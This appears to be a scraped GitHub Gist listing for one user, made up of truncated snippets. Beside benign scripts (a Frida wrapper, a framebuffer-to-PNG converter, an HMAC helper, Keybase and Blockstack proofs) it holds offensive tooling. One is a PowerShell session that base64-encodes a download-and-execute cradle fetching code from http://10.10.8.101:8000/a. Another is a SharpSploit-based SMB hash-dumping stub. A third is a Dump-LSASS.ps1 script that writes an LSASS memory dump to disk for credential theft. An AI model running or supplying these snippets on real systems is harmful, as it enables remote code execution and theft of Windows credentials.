Skip to content

Instantly share code, notes, and snippets.

using System;
using SharpSploit.Credentials;
using System.Management;
using System.IO;
class SMBDumpHash
{
static void Main(string[] args)
{
if (args.Length == 0)
PS C:\Users\User> $Text = "IEX ((new-object net.webclient).downloadstring('http://10.10.8.101:8000/a'))"
PS C:\Users\User> $Bytes = [System.Text.Encoding]::Unicode.getBytes($Text)
PS C:\Users\User> $EncodedText = [Convert]::ToBase64String($Bytes)
PS C:\Users\User> $EncodedText
Verifying my Blockstack ID is secured with the address 12Xp1RVeuUfSnCyuEwpoSa8q8hXtAsKXzr https://explorer.blockstack.org/address/12Xp1RVeuUfSnCyuEwpoSa8q8hXtAsKXzr
@T0w3ntum
T0w3ntum / Frida-wrapper.py
Created March 7, 2018 12:55
Wrapper to call Frida scripts
import frida
import sys
scriptname = sys.argv[1]
procname = sys.argv[2]
fd = open(scriptname, "r")
def on_message(message, data):
print(message)
print(data)
@T0w3ntum
T0w3ntum / Framebuffer to PNG
Created February 20, 2018 20:11 — forked from JakubVanek/ Framebuffer to PNG
Convert raw BGRA framebuffer to RGB png file
This program can be used to convert raw BGRA 8888 framebuffer to standard PNG file.
import hashlib
import hmac
import sys
secret = sys.argv[2]
message = bytes(sys.argv[1]).encode('utf-8')
secret = bytes(secret).encode('utf-8')
hash = hmac.new(secret, message, hashlib.sha256)

Keybase proof

I hereby claim:

  • I am t0w3ntum on github.
  • I am t0w3ntum (https://keybase.io/t0w3ntum) on keybase.
  • I have a public key whose fingerprint is 4753 72D7 AD1B 6C4B EBA7 B397 FED5 6B8C F90E 6B82

To claim this, I am signing this object:

@T0w3ntum
T0w3ntum / Dump-LSASS.ps1
Created March 20, 2017 00:34 — forked from natesubra/Dump-LSASS.ps1
LSASS minidump
$LSASSProc = Get-Process lsass
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()